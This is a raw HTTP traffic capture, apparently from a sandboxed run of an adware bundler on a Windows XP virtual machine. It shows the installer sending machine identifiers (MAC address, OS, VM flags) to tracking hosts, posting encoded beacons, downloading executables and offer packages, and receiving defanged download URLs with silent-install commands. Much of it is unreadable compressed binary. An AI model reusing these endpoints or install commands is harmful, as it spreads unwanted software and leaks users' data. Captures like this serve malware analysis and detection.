k$V...U!?..D.].<a....?P...P%IZ`',..J.w...L.C?...tH....].).4k.h |X'.
z....h.6!?!^..d.....hK3..k.N....X......
....

<<< skipped >>>

GET /core/lgv.js?r=9&cb=1441686154352&yt=81 HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s.xcodelib.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 102
Connection: keep-alive
Date: Tue, 08 Sep 2015 04:20:57 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=900
Expires: Tue, 08 Sep 2015 04:35:57 GMT
Content-Encoding: gzip
Age: 437
Vary: Accept-Encoding
X-Cache: Hit from cloudfront
Via: 1.1 1f3fb60768611bd03244cf06312d5a9c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 55gZ6s2yXPBD0WAPSlZdaNfJROtUR5fnPbuRP_a2P5C-uuxRG3anAQ==
...........H .K........)....O../.U2LML3II.4251NK3N1NI.4I3.44.0M4.0OLR.
..MN#NumrbIr.F.fum....5.$...z...
....



GET /core/v4/cmp_ext.js?cbt=1eaf4dc92543ff3d3dd94f691485a287ab&r=7&cb=1441686154415&yt=81 HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s.xcodelib.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 3070
Connection: keep-alive
Date: Mon, 07 Sep 2015 12:57:48 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Tue, 08 Sep 2015 12:57:48 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Age: 55825
X-Cache: Hit from cloudfront
Via: 1.1 1f3fb60768611bd03244cf06312d5a9c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: YknyOl6Reueyt-IqpzowiZxk9Ed0BKy261VruzTlyP3kGbOikTYnoA==
............is......>..hJr.g...W.6...$.$.......=...(....x.9...C....
..^.Kw4.Y.q.V.kq.D..D. ...X$..>|9..."viz@...`.......N)....,.X.ON./'
......o...~.....g..?{.7"c..0..d..O..ON.s...~...tf..............EZ....o
d.Z ...J.x0X...=...#.N...V..y8?Z9_...u...1..D..z........x&..4..k.9O...
..X..i.q.f<..........\d..?..k......E..k~/.a......O.......N@u.".M.2.
A[8.M.r..V.....4^p.H6...4......tC..Y....c...Q.B.3...-O.oZ..Z...X(. r.?
O..........g.:.....(Q<.G......e..S"............U....o...F..EK.wX...
.E*'.~...@@.RAO?N..!...b..X.5....>...Z.8$..G......e..........L.\...
.%U}.^....d6..k.....#.R.AT.l...~..6.......A...45.>.#}C...D...i.....
..M.r.4.f..}..)..S... *....,m~....~....3....^..P.)]h.....?..x.W...s...
......]s..5\d.S..u.6.h..6.u...9O.....E;w{......6nQ.....!.g...u|i......
. ......u2!.. ..YW........?'.. ...krFPI...v.....o.8....poT....*.*..C..
yZ......G....S.. .H..U......$......._2.....w]..X..W....n%.T.......N~I.
......A.X.4.;.1D6............1Ad-./m!..wlYPos-./1&.^....<.....i.NG.
.CpU.........%.mD..X........8.......4.K.}...L.t..$.Ri31...G..-_9.9..|~
.(qo....=.r..>.1.H.3...H...U..Q.E1..z..E.e:.j.f..l........A...o...9
...x)....G....E.."...=.x"m)^.%OOh......p.R.T*K...mk..,.-..w..0..62...3
..4j!..nF.W0x.ys.......9./H.....~E=...o......f......@g.......!. .:'.[2
.X..S.F....6.=(...u.l]..`..%[email protected]......|;..."r.S...V.*.5@...~....
.......H....Y.K....3T5..,..1;^][email protected]....'.c........W..~....
.... *A.X...HYYB>Dl.%....vQ...ZM..a#..Z>...q.H(X.b...l.f2....Z..
...JL3yQX.B....2....D.Phv......p....../...F".3.#.....J.J})].......

<<< skipped >>>

GET /core/v4/dyn/10100019/cxeappconf.js?vcf=1eaf4dc92543ff3d3dd94f691485a287ab&cbt=1eaf4dc92543ff3d3dd94f691485a287ab&r=7&cb=1441686154477&yt=81 HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s.xcodelib.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Length: 216
Connection: keep-alive
Date: Tue, 08 Sep 2015 03:55:24 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: maxage=10800
Expires: Tue, 08 Sep 2015 06:55:24 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Age: 1970
X-Cache: Hit from cloudfront
Via: 1.1 1f3fb60768611bd03244cf06312d5a9c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: VsqRng2sy7iGQK1Y0hvzBfI1kcGHi3wzFTr2P2B2lRQWqTdNo7eL5A==
............=..0....W..l..UG. UPp.q...m.....R..w?..T....{x...P. S. .mf
<.J...<..F........T.._.b..6.<.......F.|g ;[email protected]$
........./u...h/6{..NN.%}....'........4.RV..8.s^............./.v......
.....\oV.7.....
....



GET /core/apps/121/v1.js?cbt=1eaf4dc92543ff3d3dd94f691485a287ab&r=7&cb=1441686154540&yt=81 HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s.xcodelib.net
Connection: Keep-Alive


HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Content-Length: 151
Connection: keep-alive
Date: Tue, 08 Sep 2015 04:26:25 GMT
Server: Apache
Accept-Ranges: bytes
Content-Encoding: gzip
Age: 110
Vary: Accept-Encoding
X-Cache: Error from cloudfront
Via: 1.1 1f3fb60768611bd03244cf06312d5a9c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: nUKE1JrK9pKlJThHr6gzXX1elOtb_Hm8J0WVvImSrma9VEWf3AcPNA==
..........5....0.D.........V.f._P...l[.-...H<M&yy3j.@[email protected]...|
.g.....v.q..Rd........s...R..f....KA...=.6......;........z.....J.}\.ix
o...k.[.......
....



GET /amm/plg/ob/ext/ammbg.js?x=1&cb=1441686154587&yt=81 HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s.xcodelib.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 136
Connection: keep-alive
Date: Mon, 07 Sep 2015 05:23:18 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Tue, 08 Sep 2015 05:23:18 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Age: 83095
X-Cache: Hit from cloudfront
Via: 1.1 1f3fb60768611bd03244cf06312d5a9c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: rDjR3EpN1bKBLx_9rc8RKRlDTjekxDM7_K9zG9kRxzXlpy9ZbBwDCQ==
..........U....!...%<.l..K.........W.|[B......f..f....^Rxjjf...F._.
u.6...qc^N.U5[...*.Cw.gP..1`.1j.......>:...3.{...^l....>.?9}.{.m
.....
....



GET /amm/plg/ob/ext/bg/10100019/none/obbgint.js?x=1&cb=1441686154649&yt=81 HTTP/1.1

Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s.xcodelib.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Content-Length: 1547
Connection: keep-alive
Date: Tue, 08 Sep 2015 04:28:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Expires: Tue, 08 Sep 2015 04:28:15 GMT
Cache-Control: max-age=0
Content-Encoding: gzip
Vary: Accept-Encoding
X-Cache: Miss from cloudfront
Via: 1.1 1f3fb60768611bd03244cf06312d5a9c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: bgnnClCiMBQoS66pM0HzS4SFv6JRlZMcaCIjd79BsUPE3IIPj4-cxg==
...........XYo.8.~n..C`.......^&..#..v.l.}.h.....*.W......,;.[.....).!
..83..2.Q..z1......m.7m....c|.....;zw\}.U.U,.C:5m.z.s..o..>. ..w...
C...a`B.......E?..>F.gZ..'b..Tn...|..._2C..z&..>W...s.......(.Qc
1.......!j..KP....j....>.......z..k..~....v.1B......~uvr|\?>..'X
..q.s.Wd.2.....rzx|.l7.[.9gF.^......*.`.O...3 y`...W......WL[2'.7.Z>
;So...#T.W^...*.[....&..[Z).5.`.p.....u..rR...)mu..pM....(f].$....*R.$
L..R..R7Dr..!........{...ysA..y..(.K}..L.....[.ll....Z[.........jl.Z..
...>lP.D#:...F.@...@...../.Ca'.,....>.. .........o...9.z..:.....
..x......K....|'..Oc...8-..~G.........A;....w.D...G#...*.:.b.s....JN.4
2.em%..>*.~".. ...&..l..P......&..f.I.c. .^..*.....E.5..c...D1p....
rKL..w..N"..z..C.......&0.D.!...a...5Y......e!...y.....h~K.....8.wm...
...k...3..Th..Ec..mW\.f..}...JHU.. ..........V..B.6<.;|.....Tq.....
~Y...A..M..8.....6...9.Th..a. V0|OC...k...*....]....!...........@.&...
[email protected]&*.l....K..lRR...,.}.w.p.....9......!...i=!......
.1j.bN9...d..$o.f%.x....Eu.Z.|[T....5;...(...5...;..F...]9V-/.Y...T.f.
fg..6./K.o$go.>E..WY.n..LaP'..G"ozV...^)....F......:.|.'..#./c.....
.sH..B.... '...~...<..y..@6...!.r.;..1pm...\..A..~ D....b.b...(...;
9{..|.6O.m[B..:....dI.p@a%hx....V;.E...v"&...!...7{...P`.~C..(5..N.,J.
&&=.][email protected],[email protected]..........!KB.`0..2p...K..S.k.^..V.t.9 ...C
.p....W..3.......G"..4..DO....4.VSeK.,.m$.qE|.......~..&..j#..W.;.....
.......'~..o?./-l|.W.X....l..e...[.i..............n.|.^..0..>.5..;.
.)_^.......Pu.L...g/............`...,?..#?.).J.xg...VG//.{G(=Kr...

<<< skipped >>>

POST /rp/v/image.jpg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: cdn.austries.com
Content-Length: 96
Connection: Keep-Alive

key=jZKJflaLST96f39ifVZKSUpJSUlKUj+JjntifVZKSUpJP3qJiWJ9VkpLSj96gI9+i1ZKR0pHSUdMSg==&x=1
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-type: image/gif
Date: Tue, 08 Sep 2015 04:22:00 GMT
Server: Google Frontend
Content-Length: 43
GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Cache-Cont
rol: no-cache..Content-type: image/gif..Date: Tue, 08 Sep 2015 04:22:0
0 GMT..Server: Google Frontend..Content-Length: 43..GIF89a............
.!.......,...........D..;
....



POST /wrp/ri HTTP/1.1

Content-Type: application/x-www-form-urlencoded
Host: cdn.austries.com
Content-Length: 126
Connection: Keep-Alive

key=hnp8VklJSVxLUl9dTk5aXT96f3+CfVZKSUpJSUlKUj99jItWh4iHfj+Ji4ZWSUlJXEtSX11OTlpdP4KMj4ZWSj+Pho1WSz98e1ZKTU1KT1FPSktN&x=1
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-type: text; charset=UTF-8
Date: Tue, 08 Sep 2015 04:22:02 GMT
Server: Google Frontend
Content-Length: 4
SklJHTTP/1.1 200 OK..Cache-Control: no-cache..Content-type: text; char
set=UTF-8..Date: Tue, 08 Sep 2015 04:22:02 GMT..Server: Google Fronten
d..Content-Length: 4..SklJ
....



POST /rp/v/image.jpg HTTP/1.1

Content-Type: application/x-www-form-urlencoded
Host: cdn.austries.com
Content-Length: 280
Connection: Keep-Alive

key=jZKJflaLjI16i40/en9/Yn1WSklKSUlJSlI/iY57Yn1WSklKST96iYlifVZKS0o/eoCPfotWSkdKR0lHTEo/gI6CfVaUUE9NUF5fTU5GX01aXEZNSVtcRlJdXV5GSlpcTl1MS1FOT05cRktJSk54SVJ4SVGWP4Z6fFZJSUlcS1JfXU5OWl0/fIiMVnFpTEs/fYyLVoeIh34/iYB9VoeIh34/e46CfVZKSUk/jYyNVmeIh34/kVZKSko=&x=1
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-type: image/gif
Date: Tue, 08 Sep 2015 04:22:02 GMT
Server: Google Frontend
Content-Length: 43
GIF89a.............!.......,...........D..;



POST /rp/v/image.jpg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: cdn.austries.com
Content-Length: 288
Connection: Keep-Alive

key=jZKJflaHjIKMjI16i414gn4/en9/Yn1WSklKSUlJSlI/iY57Yn1WSklKST96iYlifVZKS0o/eoCPfotWSkdKR0lHTEo/gI6CfVaUUE9NUF5fTU5GX01aXEZNSVtcRlJdXV5GSlpcTl1MS1FOT05cRktJSk54SVJ4SVGWP4Z6fFZJSUlcS1JfXU5OWl0/fIiMVnFpTEs/fYyLVoeIh34/iYB9VoeIh34/e46CfVZKSUk/jYyNVmeIh34/kVZKSko=&x=1
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-type: image/gif
Date: Tue, 08 Sep 2015 04:22:04 GMT
Server: Google Frontend
Content-Length: 43
GIF89a.............!.......,...........D..;....



POST /rp/v/image.jpg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: cdn.austries.com
Content-Length: 280
Connection: Keep-Alive

key=jZKJflaOh3+Ch4KMgT96f39ifVZKSUpJSUlKUj+JjntifVZKSUpJP3qJiWJ9VkpLSj96gI9+i1ZKR0pHSUdMSj+AjoJ9VpRQT01QXl9NTkZfTVpcRk1JW1xGUl1dXkZKWlxOXUxLUU5PTlxGS0lKTnhJUnhJUZY/hnp8VklJSVxLUl9dTk5aXT98iIxWcWlMSz99jItWh4iHfj+JgH1Wh4iHfj97joJ9VkpJST+NjI1WZ4iHfj+RVkpKSg==&x=1
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-type: image/gif
Date: Tue, 08 Sep 2015 04:22:05 GMT
Server: Google Frontend
Content-Length: 43
GIF89a.............!.......,...........D..;



POST /rp/v/image.jpg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: cdn.austries.com
Content-Length: 292
Connection: Keep-Alive

key=jZKJflZ+kY2LfI1/goeCjIE/en9/Yn1WSklKSUlJSlI/iY57Yn1WSklKST96iYlifVZKS0o/eoCPfotWSkdKR0lHTEo/gI6CfVaUUE9NUF5fTU5GX01aXEZNSVtcRlJdXV5GSlpcTl1MS1FOT05cRktJSk54SVJ4SVGWP4Z6fFZJSUlcS1JfXU5OWl0/fIiMVnFpTEs/fYyLVoeIh34/iYB9VoeIh34/e46CfVZKSUk/jYyNVmeIh34/kVZKSko=&x=1
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-type: image/gif
Date: Tue, 08 Sep 2015 04:22:05 GMT
Server: Google Frontend
Content-Length: 43
GIF89a.............!.......,...........D..;



POST /rp/v/image.jpg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: cdn.austries.com
Content-Length: 284
Connection: Keep-Alive

key=jZKJflaHjIKMeH+Ch4KMgT96f39ifVZKSUpJSUlKUj+JjntifVZKSUpJP3qJiWJ9VkpLSj96gI9+i1ZKR0pHSUdMSj+AjoJ9VpRQT01QXl9NTkZfTVpcRk1JW1xGUl1dXkZKWlxOXUxLUU5PTlxGS0lKTnhJUnhJUZY/hnp8VklJSVxLUl9dTk5aXT98iIxWcWlMSz99jItWh4iHfj+JgH1Wh4iHfj97joJ9VkpJST+NjI1WZ4iHfj+RVkpKSg==&x=1
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-type: image/gif
Date: Tue, 08 Sep 2015 04:22:15 GMT
Server: Google Frontend
Content-Length: 43
GIF89a.............!.......,...........D..;


GET /testadsreel_10656.exe HTTP/1.1
Host: secured.nmsgv.us
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Tue, 08 Sep 2015 04:22:23 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1441631504"
Last-Modified: Mon, 07 Sep 2015 13:11:44 GMT
Cache-Control: max-age=32721
Content-Length: 228307
Content-Type: application/octet-stream
X-HW: 1441686143.dop009.fr7.t,1441686143.cds015.fr7.c

<<< skipped >>>

GET /client-cmd/cr.html?type=install_reg&affId=10100019&pubId=1010&appId=121&agver=1.1.0.31&guid={7647EF45-F4AC-40BC-9DDE-1AC5D328565C-2015_09_08}&os=XP32&manu=Intel Corporation___VMware, Inc.&ff=&ch=&ie=6.0.2900.5512&mac=000C29FD55AD&dsr=none&pgd=none&bid=0&buid=100&vm=2&wktm=14&cb=1441686132 HTTP/1.1
Host: s3.zawss.info
Connection: Keep-Alive


HTTP/1.1 200 OK
x-amz-id-2: M7vCQ3VQ/n20qvOsf96OzzWuVAKgH/l0kqnjpBt3Jahf8TWgwnwKFUL9f89cCJZwGJddvEdZ 20=
x-amz-request-id: 3DEF045CAF143D99
Date: Tue, 08 Sep 2015 04:22:10 GMT
Last-Modified: Tue, 28 Apr 2015 16:05:06 GMT
ETag: "d152c08a253fe1bd8ede751d571ac800"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 36
Server: AmazonS3
<html>..<body>..ok..</body>..</html>


GET /client-cmd/cr.html?type=strunner&affId=10100019&pubId=1010&appId=121&agver=1.1.0.31&guid={7647EF45-F4AC-40BC-9DDE-1AC5D328565C-2015_09_08}&os=XP32&manu=Intel Corporation___VMware, Inc.&ff=&ch=&ie=6.0.2900.5512&mac=000C29FD55AD&dsr=none&pgd=none&bid=0&buid=100&vm=2&wktm=14&cb=1441686141 HTTP/1.1
Host: s3.zawss.info
Connection: Keep-Alive


HTTP/1.1 200 OK
x-amz-id-2: lT87BVuI2CN/NrY59Jo2Y9N3Hmtps0jLBN1RxuAjEHbgghBoeZ4qE7KYQmQlDT04/u7p6p lnzU=
x-amz-request-id: D796A67BE3DB4F2A
Date: Tue, 08 Sep 2015 04:22:19 GMT
Last-Modified: Tue, 28 Apr 2015 16:05:06 GMT
ETag: "d152c08a253fe1bd8ede751d571ac800"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 36
Server: AmazonS3
<html>..<body>..ok..</body>..</html>


GET /amm/apps/121/10100019/loader.js?x=1&cb=1441686142118&yt=81 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s10100019.xcodelib.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/javascript
Content-Length: 659
Connection: keep-alive
Date: Mon, 07 Sep 2015 17:27:48 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=86400
Expires: Tue, 08 Sep 2015 17:27:48 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Age: 39613
X-Cache: Hit from cloudfront
Via: 1.1 1f3fb60768611bd03244cf06312d5a9c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: Ng373yrQ3DmckHn6wgZrGPIL6wiJlN7MvCp7qVNKrO2z7u3L0DNivw==

<<< skipped >>>

POST /DSS_Unq_IMapplication_mon_remote.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.stsunsetwest.com
Content-Length: 281
Connection: Keep-Alive
Cache-Control: no-cache

from=nsis&type=Reg&mode=checker&utid=194.242.96.218_2015-09-08_00:22:25&pubid=15690&CbId=10656&BundleVersionID=IM_240914@01&subid=&mid=qGKynuZ0mulJUhgaWZBaX8M7O6jfLzmQ&DB=IE&arc=32&skexist=NO&avsexist=NO&advDetails=12~YES~0/419~NO~4/422~YES~0/432~NO~15/460~YES~0/575~NO~4/576~NO~4/
HTTP/1.1 200 OK
Date: Tue, 08 Sep 2015 04:22:26 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 611
Connection: close
Content-Type: text/html; charset=UTF-8
422~hXXp://secured.nmsgv.us/os/rm/OfferScreen_422.zip~hXXp://VVV.djapp.info/?file=bundle~hXXp://VVV.djapp.info/?file=bundle~null~0~1~0.01#12~hXXp://secured.nmsgv.us/os/rm/OfferScreen_12_HD.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0
422#RE3|mystartsearchSoftware\mystartsearchhp#RCMD|-pub_id=314 -adv_id=76#SLP|30^6#PKG|NO#INT|Mntz_Installer.exe
12#RE2|Systweak\RegClean Pro\Version 6.1#RCMD|/verysilent#SLP|10^3#FNV|WriteINI^hXXp://dl.ourinputinfonet.com/monti/llyun/hd/setup.exe#PKG|NO#INT|rcpsetup_17970.exe


POST /rp/v/image.jpg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: cdn.austries.com
Content-Length: 286
Connection: Keep-Alive

key=jZKJflaCh4yNeoWFeIyNeouNP3p/f2J9VkpJSklJSUpSP4mOe2J9VkpJSkk/eomJYn1WSktKP3qAj36LVkpHSkdJR0xKP4COgn1WlFBPTVBeX01ORl9NWlxGTUlbXEZSXV1eRkpaXE5dTEtRTk9OXEZLSUpOeElSeElRlj+GenxWSUlJXEtSX11OTlpdP32Mi1aHiId+P4mAfVaHiId+P3uCfVZJP3uOgn1WSklJP4+GVks/fHtWSk1NSk9RT0pMSg==&x=1
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-type: image/gif
Date: Tue, 08 Sep 2015 04:22:08 GMT
Server: Google Frontend
Content-Length: 43
GIF89a.............!.......,...........D..;....



POST /rp/v/image.jpg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: cdn.austries.com
Content-Length: 388
Connection: Keep-Alive

key=jZKJflaCh4yNeoWFP3p/f2J9VkpJSklJSUpSP4mOe2J9VkpJSkk/eomJYn1WSktKP3qAj36LVkpHSkdJR0xKP4COgn1WlFBPTVBeX01ORl9NWlxGTUlbXEZSXV1eRkpaXE5dTEtRTk9OXEZLSUpOeElSeElRlj+IjFZxaUxLP4Z6h45WYoeNfoU5XIiLiYiLeo2CiId4eHhvZpB6i35FOWKHfEc/f39WP3yBVj+CflZPR0lHS1JJSUdOTkpLP4Z6fFZJSUlcS1JfXU5OWl0/fYyLVoeIh34/iYB9VoeIh34/e4J9Vkk/e46CfVZKSUk/j4ZWSz+QhI2GVkpNP3x7VkpNTUpPUU9KTEo=&x=1
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-type: image/gif
Date: Tue, 08 Sep 2015 04:22:08 GMT
Server: Google Frontend
Content-Length: 43
GIF89a.............!.......,...........D..;



POST /rp/v/image.jpg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: cdn.austries.com
Content-Length: 404
Connection: Keep-Alive

key=jZKJflaCh4yNeoWFeHqLjHw/en9/Yn1WSklKSUlJSlI/iY57Yn1WSklKST96iYlifVZKS0o/eoCPfotWSkdKR0lHTEo/gI6CfVaUUE9NUF5fTU5GX01aXEZNSVtcRlJdXV5GSlpcTl1MS1FOT05cRktJSk54SVJ4SVGWP4iMVnFpTEs/hnqHjlZih41+hTlciIuJiIt6jYKIh3h4eG9mkHqLfkU5Yod8Rz9/f1Y/fIFWP4J+Vk9HSUdLUklJR05OSks/hnp8VklJSVxLUl9dTk5aXT99jItWh4iHfj+JgH1Wh4iHfj97gn1WST97joJ9VkpJST+PhlZLP5CEjYZWSk0/fHtWSk1NSk9RT0pMUA==&x=1
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-type: image/gif
Date: Tue, 08 Sep 2015 04:22:14 GMT
Server: Google Frontend
Content-Length: 43
GIF89a.............!.......,...........D..;....



POST /rp/v/image.jpg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: cdn.austries.com
Content-Length: 394
Connection: Keep-Alive

key=jZKJflaCh4yNeoWFeH6HfT96f39ifVZKSUpJSUlKUj+JjntifVZKSUpJP3qJiWJ9VkpLSj96gI9+i1ZKR0pHSUdMSj+AjoJ9VpRQT01QXl9NTkZfTVpcRk1JW1xGUl1dXkZKWlxOXUxLUU5PTlxGS0lKTnhJUnhJUZY/iIxWcWlMSz+GeoeOVmKHjX6FOVyIi4mIi3qNgoiHeHh4b2aQeot+RTlih3xHP39/Vj98gVY/gn5WT0dJR0tSSUlHTk5KSz+GenxWSUlJXEtSX11OTlpdP32Mi1aHiId+P4mAfVaHiId+P3uCfVZJP3uOgn1WSklJP4+GVks/kISNhlZKTT98e1ZKTU1KT1FPSkxR&x=1
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-type: image/gif
Date: Tue, 08 Sep 2015 04:22:14 GMT
Server: Google Frontend
Content-Length: 43
GIF89a.............!.......,...........D..;


GET /os/rm/OfferScreen_422.zip HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: secured.nmsgv.us
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Tue, 08 Sep 2015 04:22:26 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1426709167"
Last-Modified: Wed, 18 Mar 2015 20:06:07 GMT
Cache-Control: max-age=32746
Content-Length: 7218
Content-Type: application/zip
X-HW: 1441686147.dop009.fr7.t,1441686146.cds009.fr7.c

<<< skipped >>>

GET /os/rm/OfferScreen_12_HD.zip HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: secured.nmsgv.us
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Tue, 08 Sep 2015 04:22:26 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1411022125"
Last-Modified: Thu, 18 Sep 2014 06:35:25 GMT
Cache-Control: max-age=32746
Content-Length: 10048
Content-Type: application/zip
X-HW: 1441686147.dop010.fr7.t,1441686146.cds037.fr7.c

<<< skipped >>>

POST /rp/v/image.jpg HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: cdn.austries.com
Content-Length: 436
Connection: Keep-Alive

key=jZKJflZ6fI2Cj34/fIeNVkk/iYuPjYZWSUp4SUp4SUt4SUl4SUk/fYVWTD96f39ifVZKSUpJSUlKUj+JjntifVZKSUpJP3qJiWJ9VkpLSj96gI9+i1ZKR0pHSUdMSj+AjoJ9VpRQT01QXl9NTkZfTVpcRk1JW1xGUl1dXkZKWlxOXUxLUU5PTlxGS0lKTnhJUnhJUZY/iIxWcWlMSz+GeoeOVmKHjX6FOVyIi4mIi3qNgoiHeHh4b2aQeot+RTlih3xHP39/Vj98gVY/gn5WT0dJR0tSSUlHTk5KSz+GenxWSUlJXEtSX11OTlpdP32Mi1aHiId+P4mAfVaHiId+P3uCfVZJP3uOgn1WSklJP4+GVks/kISNhlZKTT98e1ZKTU1KT1FPSk1P&x=1
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-type: image/gif
Date: Tue, 08 Sep 2015 04:22:23 GMT
Server: Google Frontend
Content-Length: 43
GIF89a.............!.......,...........D..;


GET /client-cmd/cr.html?type=install&affId=10100019&pubId=1010&appId=121&agver=1.1.0.31&guid={7647EF45-F4AC-40BC-9DDE-1AC5D328565C-2015_09_08}&os=XP32&manu=Intel Corporation___VMware, Inc.&ff=&ch=&ie=6.0.2900.5512&mac=000C29FD55AD&dsr=none&pgd=none&bid=0&buid=100&vm=2&wktm=14&cb=1441686132 HTTP/1.1
Host: s3.zawss.info
Connection: Keep-Alive


HTTP/1.1 200 OK
x-amz-id-2: IDc8l YobxREKOQZRwpLsJAxlqUxwch52hitKwNL8iYdO7OiyAnHIWIoOFtAfpn1TIXHaDs39jk=
x-amz-request-id: 5CA84AF807EBB1C3
Date: Tue, 08 Sep 2015 04:22:09 GMT
Last-Modified: Tue, 28 Apr 2015 16:05:06 GMT
ETag: "d152c08a253fe1bd8ede751d571ac800"
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 36
Server: AmazonS3
<html>..<body>..ok..</body>..</html>


POST /FCL_Co_Unq_remote_v5.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.fcesneim.us
Content-Length: 107
Connection: Keep-Alive
Cache-Control: no-cache

from=nsis&type=Reg&pubid=15690&CbId=10656&BundleVersionID=IM_240914@01&mid=qGKynuZ0mulJUhgaWZBaX8M7O6jfLzmQ
HTTP/1.1 200 OK
Date: Tue, 08 Sep 2015 04:22:25 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Content-Length: 1870
Connection: close
Content-Type: text/html; charset=UTF-8
hXXp://VVV.stsunsetwest.com/DSS_Unq_IMapplication_mon_remote.php
http://VVV.stsunsetwest.com/DS_Unq_trackstats_mon.php
UA
hXXp://VVV.stsunsetwest.com/DS_AdvAffiliateId.php
194.242.96.218_2015-09-08_00:22:25
NULL
12#RE2|Systweak\RegClean Pro\Version 6.1
